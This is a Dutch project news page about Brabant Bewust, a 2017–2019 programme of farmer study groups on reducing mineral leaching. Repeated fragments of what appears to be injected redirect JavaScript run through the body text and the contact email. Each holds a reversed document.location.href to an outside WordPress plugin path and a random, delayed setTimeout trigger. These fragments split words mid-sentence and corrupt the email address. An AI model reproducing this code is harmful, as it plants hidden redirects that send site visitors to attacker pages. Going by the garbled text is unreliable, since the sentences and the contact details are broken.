Ondernemersgroepen Brabant Bewust van start!

Algemeen

Binnen het project Brabant Bewust wordt gestart met 24 ondernemersgroepen, verdeeld over heel Brabant over de sectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren Plantaardig (akkerbouw / vollegrondsgroente) en Veehouderij. Hiermee is een toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal bereik van minimaal 25.000 ha cultuurgrond! Intussen is de werving in afronding en zijn de startbijeenkomsten in volle uitvoering. De uitvoering van de ondernemersgroepen vindt plaats vanuit Delphy, ZLTO en DLV Rundvee Advies. CLM begeleidt het project rond inzichten voor ‘kennis en motivatie’ om het thema uitspoeling van mineralen in beeld te brengen.
Gedurende het project worden motivatiebijeenkomsten, trainingen, veldexcursies en grootschalige demonstratiebijeenkomsten georganiseerd in de periode 2017 – 2019.

1e bijeenkomsten van start !

Vanuit de uitvoerende organisaties zijn inmiddels vele startbijeenkomsten voorbereid en uitgevoerd vanuit Brabant BEWUST. De aftrap is zeer geslaagd verlopen.
In de opstartbijeenkomsten zijn agrariërs en loonwerkers geïnformeerd over de mogelijkheden van het project. Verder hebben de adviseurs de deelnemers een breed scala aan mogelijkheden geschetst voor wat betreft het programma en de aanpak om met maatregelen emissies tegen te gaan. Het was de eerste stap naar een betere mineralenbenutting!

Met name de wisselwerking met loonwerkers en agrariërs maakt het interessant. De loonwerker draagt immers bij aan het productieproces van de akkerbouwers en de veehouders. Een betere benutting van mineralen is dus in veel gevallen de verdienste van een goede samenwerking.

Interesse voor deelname?

Wilt u alsnog meedoen met Brabant BEWUST in een van de studiegroepen? Dan kunt u zich melden via wico.dieleman@zltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.nl